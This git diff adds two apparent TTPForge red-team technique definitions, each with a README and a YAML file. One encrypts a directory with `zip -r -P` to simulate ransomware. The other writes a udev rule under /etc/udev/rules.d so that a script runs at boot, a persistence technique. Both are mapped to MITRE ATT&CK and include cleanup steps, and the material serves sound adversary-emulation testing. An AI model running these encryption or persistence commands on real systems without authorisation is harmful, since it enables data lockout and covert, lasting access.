facebookincubator · gerbsec · Aug 27, 2024 · Aug 27, 2024 · Sep 16, 2024 · Sep 16, 2024
@@ -0,0 +1,51 @@
+# LOTL Ransomware Encryption
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-red)
+
+This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors.
+
+## Arguments
+
+- **target_dir**: The directory to encrypt.
+
+  Default: /dev/shm
+
+- **encryption_key**: The password used to encrypt the directory.
+
+  Default: password
+
+## Requirements
+
+1. Access to a Linux system where the `zip` and `unzip` commands are available.
+2. Permission to modify files within the target directory.
+
+## Examples
+
+You can run the TTP using the following command (adjust arguments as needed):
+
+```bash
+ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml \
+    --arg target_dir="/path/to/target/dir" \
+    --arg encryption_key="your_encryption_key"
+```
+
+## Steps
+
+1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password.
+
+   ```bash
+   zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}
+   ```
+
+1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory.
+
+   ```bash
+   unzip -o -P {{ .Args.encryption_key }} ttpforge.zip
+   ```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0040 Impact
+- **Techniques**:
+  - T1486 Data Encrypted for Impact
@@ -0,0 +1,34 @@
+---
+api_version: 2.0
+uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9
+name: "LOTL Ransomware"
+description: |
+  "Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine."
+
+args:
+  - name: target_dir
+    decription: The directory which we will encrypt.
+    default: /dev/shm
+  - name: encryption_key
+    description: The key which we will use to encrypt the data with.
+    default: password
+
+requirements:
+  platforms:
+    - os: linux
+
+mitre:
+  tactics:
+    - "TA0040 Impact"
+  techniques:
+    - "T1486 Data Encrypted for Impact"
+
+steps:
+  - name: encrypt_dir
+    description: Encrypt provided directory
+    inline: |
+      zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}
+
+    cleanup:
+      inline: |
+        unzip -o -P {{ .Args.encryption_key }} ttpforge.zip
@@ -0,0 +1,58 @@
+# UDEV Persistence Technique
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-red)
+
+This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization.
+
+## Arguments
+
+- **target_path**: The path where the script and udev rule will be created.
+
+  Default: /dev
+
+## Requirements
+
+1. Access to a Linux system with permissions to modify udev rules.
+1. Ability to write files in critical system directories.
+
+## Examples
+
+You can run the TTP using the following command (adjust arguments as needed):
+
+```bash
+ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \
+    --arg target_path="/your/custom/path"
+```
+
+## Steps
+
+1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot.
+
+   ```bash
+   #!/bin/bash
+   echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh
+   chmod 0600 {{ .Args.target_path }}/udev.sh
+   ```
+
+1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time.
+
+   ```bash
+   echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules
+   ```
+
+## Cleanup
+
+1. **remove_udev_rule**: Deletes the udev rule from the system.
+
+   ```bash
+   rm /etc/udev/rules.d/75-persistence.rules
+   ```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0003 Persistence
+- **Techniques**:
+  - T1546 Event Triggered Execution
+- **Subtechniques**:
+  - T1546.004 Unix Shell Configuration Modification
@@ -0,0 +1,38 @@
+---
+api_version: 2.0
+uuid: 96c74a6e-ecec-4559-846e-8027e1612a33
+name: "UDEV Persistence Technique"
+description: |
+  "This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access."
+
+args:
+  - name: target_path
+    description: The path where the script and udev rule will be created.
+    default: /dev
+
+requirements:
+  platforms:
+    - os: linux
+
+mitre:
+  tactics:
+    - "TA0003 Persistence"
+  techniques:
+    - "T1546 Event Triggered Execution"
+  subtechniques:
+    - "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification"
+steps:
+  - name: create_persistence_script
+    decription: Create the script that will be executed at boot.
+    create_file: {{ .Args.target_path }}/udev.sh
+    contents:
+      touch /root/exploited
+    mode: 0600
+    cleanup: default
+
+  - name: add_udev_rule
+    description: Add a udev rule to trigger the script at boot when /dev/random is loaded.
+    create_file: "/etc/udev/rules.d/75-persistence.rules"
+    contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"
+    cleanup:
+      remove_path: "/etc/udev/rules.d/75-persistence.rules"